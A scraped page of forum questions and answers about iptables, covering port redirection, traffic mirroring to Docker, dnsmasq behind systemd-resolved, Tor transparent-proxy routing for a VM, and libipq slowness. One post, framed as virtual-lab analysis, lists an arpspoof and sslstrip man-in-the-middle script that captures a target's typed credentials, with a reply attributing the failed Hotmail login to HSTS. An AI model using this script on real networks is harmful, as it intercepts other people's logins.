Following line is appears in several SO answers regarding how to serve node applications through port 80: the aadvice being given is to forward the traffic to an unprivileged port.
iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 3000
However, when I try this on Ubuntu 12.04 iptables helpfully does absolutely SFA. Nothing. Am I running afoul of an iptables version thing here?
Has anyone got a proven solution that will work on Ubuntu 12.04 et al.? Much appreciated.
Note that the -i eth0, means it will only work for things coming from the network eth0. So it won't work if you test it from localhost, and it won't work if your hardware is slightly different. Try removing the -i eth0 entirely.
Related
I am trying to forward/clone traffic from my host machine to my docker container using IPtables command.
I am able to receive traffic inside my container via iptables TEE command. However, this command changes the ethernet header by replacing SRC ethernet mac with host ethernet mac. I am interested in collecting this data for my project.
Is there any other way I can achieve this?
Commands used:
1. iptables -t mangle -I PREROUTING -i <host_interface_name>-p tcp -j TEE --gateway <container_ip>
2. iptables -t nat -A PREROUTING -p tcp -j DNAT --to-destination <container_ip:port>
IPtables operate at the network layer and route the packet from the host where the rules were added. Therefore, we cannot avoid update of the source mac. I've tried using TPROXY, FORWARD, ACCEPT. Found the documentation for this at https://ipset.netfilter.org/iptables-extensions.man.html#lbDU
Achieved my requirement using : Linux TC. Simple inbuild Linux Traffic Controller can be used for shaping traffic moving through your interfaces.
https://man7.org/linux/man-pages/man8/tc-mirred.8.html
I am confused about situation in my NATed network. I start dnsmasq on router, with listen-address=192.168.100.1 and -p 5353 option for DNS port. Afterwards, i add iptables rule for hosts inside that network:
iptables -t nat -I PREROUTING -s 192.168.100.0/24 \
-d 192.168.100.1 -p udp --dport 53 -j REDIRECT --to-ports 5353
But this didn't work first time, since my INPUT policy is DROP: when i add this rule, everything starts to work:
iptables -I INPUT -p udp --dport 53 -d 127.0.0.53 -j ACCEPT
I discovered this address with help of -j LOG on my INPUT chain, where i saw packets dropped like SRC=127.0.0.1 DST=127.0.0.53 ..., when NATed host is trying to resolve hostname.
As i am writing automated script that generates correct netfilter rules for situation, i need to know from where this 127.0.0.53 could come from.
I see the same address in /etc/resolv.conf. But i don't understand who's routing this packet to this address when it is "redirected", if even close to understanding what happens.
systemd-resolved sets up a stub listener for dns requests locally on 127.0.0.53:53
try disabling it to proceed sudo systemctl disable systemd-resolved
I'm analysing the traffic on my Virtual Lab, using arpspoof/sslstrip.
I'm using the following script
iptables -A INPUT -i eth1 -p tcp --dport 80 -j ACCEPT
iptables -A INPUT -i eth1 -p tcp --dport 8080 -j ACCEPT
iptables -A PREROUTING -t nat -i eth1 -p tcp --dport 80 -j REDIRECT --to-port 8080
echo '1' > /proc/sys/net/ipv4/ip_forward
-- 10.10.10.2 Target
-- 10.10.10.1 Router
arpspoof -i eth1 -t 10.10.10.2 10.10.10.1
arpspoof -i eth1 -t 10.10.10.1 10.10.10.2
sslstrip -l 8080
This work partially since I can get the info in the sslstrip.log file just fine.
The problem is that the PC target (Win7 64 Bit IE 11) is unable to successfully complete the login process.
What happens is:
On the target PC I write https://hotmail.com.ar
It's get redirected to http://hotmail.com.ar
I type usser & passdord
The info is correctly save in sslstrip.log
BUT after confirm, the browser reload the page without actually login in
What seems to be the problem ?
Thanks
I know the question is older than two years and you have probably found a solution. I tried the same scenario for a research on Hotmail and come to the same problem.
I think the answer for this problem is that Hotmail is using for the authentication the HTTP Strict Transport Security (HSTS), that allows the server only to connect with HTTPS-connections. Uncertain I do not know why Hotmail is not using the HSTS for the inputs of the username and password and only for the authentication.
I hope I could help you
i REALLY need some help before my laptop goes through the wall.
I want to run a virtual machine through tor middlebox. I want the entire VM`s connection to go through the tor network. (Im wanting to setup my hidden service and for my needs this will work best)
I started by looking here - http://www.howtoforge.com/how-to-set-up-a-tor-middlebox-routing-all-virtualbox-virtual-machine-traffic-over-the-tor-network
I know this is old but i figured i`d give it a go anyway.
For reference my Host machine is running Ubuntu 13.04 and the VM will be running 12.04LTS. On virtualbox
Well i have tor installed as per the guide, i have gone though the setup steps. But it didnt work. My VM will not connect to the net. I checked ifconfig and i am recieving an ip address, but i cant get a connection to the web to check i am running through tor.
I`ve spent a good few hours on this but i cant get it working, im just at point and click mode now. Looked at so many sites, and almost all of them point back to the original. I have tried tweaking the settings, and looked at numerous forums. But i cant get this working.
If i try using the tor browser bundle, it refuses to start tor, stating the it hasn`t got permission or cant listen on 172.16.0.1:53. tried using vidalia bundle for the tor install but that refuses to find the tor exec (not really an issue)
Here are the settings i am trying to run with...
/etc/network/interfaces
as stated in guide
/etc/dnsmasq.conf
interface=vnet0
listen-address=192.168.1.1
dhcp-range=172.16.0.2,172.16.0.254,1h
/etc/tor/torrc
VirtualAddrNetwork 10.192.0.0/10
AutomapHostsOnResolve 1
TransPort 9040
TransListenAddress 172.16.0.1
TransListenAddress 192.168.1.1
DNSPort 53
DNSListenAddress 172.16.0.1
DNSListenAddress 192.168.1.1
middlebox.sh
#!/bin/sh
# destinations you don't want routed through Tor
NON_TOR="192.168.1.0/24 192.168.0.0/24"
# the UID Tor runs as
TOR_UID="109"
# Tor's TransPort
TRANS_PORT="9040"
# your internal interface
INT_IF="vnet0"
iptables -F
iptables -t nat -F
iptables -t nat -A OUTPUT -o lo -j RETURN
iptables -t nat -A OUTPUT -m owner --uid-owner $TOR_UID -j RETURN
iptables -t nat -A OUTPUT -p udp --dport 53 -j REDIRECT --to-ports 53
for NET in $NON_TOR; do
iptables -t nat -A OUTPUT -d $NET -j RETURN
iptables -t nat -A PREROUTING -i $INT_IF -d $NET -j RETURN
done
iptables -t nat -A OUTPUT -p tcp --syn -j REDIRECT --to-ports $TRANS_PORT
iptables -t nat -A PREROUTING -i $INT_IF -p udp --dport 53 -j REDIRECT --to-ports 53
iptables -A FORWARD -i $INT_IF -p udp -j DROP
iptables -t nat -A PREROUTING -i $INT_IF -p tcp --syn -j REDIRECT --to-ports $TRANS_PORT
iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
for NET in $NON_TOR 127.0.0.0/8; do
iptables -A OUTPUT -d $NET -j ACCEPT
done
iptables -A OUTPUT -m owner --uid-owner $TOR_UID -j ACCEPT
iptables -A OUTPUT -j REJECT
Does this article help you? http://www.mike-warren.com/articles/routing-vm-traffic-through-tor.html
The short version is:
host runs a tun/tap device
host runs a VDE switch (which puts packets from the VM into the tap device)
host has iptables NAT rules to shovel tap device traffic into Tor
host runs Tor as transparent proxy
VM has static IP, connected to VDE switch
Instead of all that, you could run TAILS instead. https://tails.boum.org/
Consider running tails as vm guest.
Use a vm snapshot to avoid booting from tails live dvd (iso)
I am making a packet filtering program running on Ubuntu 12.04 which uses libipq as the library for copying packets into userspace. The logic of libipq works fine for me, my issue is that I have noticed a significant performance hit from using libipq to not using libipq. If I remove my iptable rules that I added for my program and let the kernel handle the packets, the speed is 50 MB/s. However, when using libipq and having restored my iptables rule, the speed goes down to 1 MB/s (if i'm lucky), it's usually half of that.
I wonder, could something be wrong with my iptable rules? Could there be a more efficient use of rules, or is libipq simply that inefficient (or my code even though I don't do that much)? Here is the script I use to setup my iptable rules:
#!/bin/sh
modprobe iptable_filter
modprobe ip_queue
iptables -A FORWARD -p icmp -j QUEUE
iptables -A FORWARD -p tcp -j QUEUE
iptables -A FORWARD -p udp-j QUEUE
iptables -A INPUT -p icmp -j QUEUE
iptables -A INPUT -p tcp -j QUEUE
iptables -A INPUT -p udp -j QUEUE
Other than that, my iptable rules are the default set that came with Ubuntu.
NOTE: My setup is for a client and server VM on two different subnets and using my Ubuntu VM to bridge both using NAT and ip masquerading.
Libipq has been deprecated in favour of the newer libnetfilter_queue